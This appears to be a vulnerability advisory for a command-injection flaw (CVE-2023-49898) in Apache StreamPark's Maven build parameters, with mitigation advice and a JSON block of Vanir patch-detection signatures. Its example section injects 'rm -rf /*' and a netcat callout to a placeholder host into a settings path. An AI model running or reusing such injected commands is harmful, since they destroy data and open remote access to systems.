In streampark, there is a project module that integrates Maven's compilation capability. However, there is no check on the compilation parameters of Maven. allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.
Mitigation:
all users should upgrade to 2.1.2
Example:
/usr/share/java/maven-3/conf/settings.xml || rm -rf /*
/usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 &
{ "vanir_signatures": [ { "id": "CVE-2023-49898-0d53d50c", "digest": { "length": 2933.0, "function_hash": "142451175898494998662816931160104097482" }, "signature_version": "v1", "target": { "file": "streampark-console/streampark-console-service/src/main/java/org/apache/streampark/console/core/service/impl/AppBuildPipeServiceImpl.java", "function": "prepareJars" }, "deprecated": false, "signature_type": "Function", "source": "https://github.com/apache/incubator-streampark/commit/e662e47418f5b20c9fcbd86939132194ec77e76e" }, { "id": "CVE-2023-49898-6fe0607e", "digest": { "line_hashes": [ "76338922572233697968312917938297382954", "138709318156726881422762871284011097771", "27563879648865355408394249156762325468", "276756420641197340496057301930488851989" ], "threshold": 0.9 }, "signature_version": "v1", "target": { "file": ".mvn/wrapper/MavenWrapperHelper.java" }, "deprecated": false, "signature_type": "Line", "source": "https://github.com/apache/incubator-streampark/commit/e662e47418f5b20c9fcbd86939132194ec77e76e" }, { "id": "CVE-2023-49898-b77f72d5", "digest": { "line_hashes": [ "83684661595795697999006364337340042996", "115026717400556580559446004849304547706", "223349224988443629445506196801140653292" ], "threshold": 0.9 }, "signature_version": "v1", "target": { "file": "streampark-console/streampark-console-service/src/main/java/org/apache/streampark/console/core/entity/Application.java" }, "deprecated": false, "signature_type": "Line", "source": "https://github.com/apache/incubator-streampark/commit/e662e47418f5b20c9fcbd86939132194ec77e76e" }, { "id": "CVE-2023-49898-cfdacaa8", "digest": { "line_hashes": [ "221482226312325498041445107140056883717", "278372266637031400425052499766713896755", "308184987414297417715884655277634973762", "109721080902064859109454280746581917785", "189012469814121709474573291634845381484", "185791378126076316144918461577924640800", "183703384868016294802697228125699927901", "80111946271225929203859251249931010589", "232357022325168241111651363835470870422", "124113731693372171016951822606449010928", "55202712916739917845018416590659262026", "55505831842791509682681247976222412661" ], "threshold": 0.9 }, "signature_version": "v1", "target": { "file": "streampark-console/streampark-console-service/src/main/java/org/apache/streampark/console/core/service/impl/AppBuildPipeServiceImpl.java" }, "deprecated": false, "signature_type": "Line", "source": "https://github.com/apache/incubator-streampark/commit/e662e47418f5b20c9fcbd86939132194ec77e76e" }, { "id": "CVE-2023-49898-dfd4a9d2", "digest": { "line_hashes": [ "222464668846439263953617346370995476873", "237139840142159621766878769110390273786", "287826707287086014929924355203740489487", "9730374963767865837527598167335794757" ], "threshold": 0.9 }, "signature_version": "v1", "target": { "file": "streampark-console/streampark-console-service/src/main/java/org/apache/streampark/console/core/service/impl/ApplicationServiceImpl.java" }, "deprecated": false, "signature_type": "Line", "source": "https://github.com/apache/incubator-streampark/commit/e662e47418f5b20c9fcbd86939132194ec77e76e" } ] }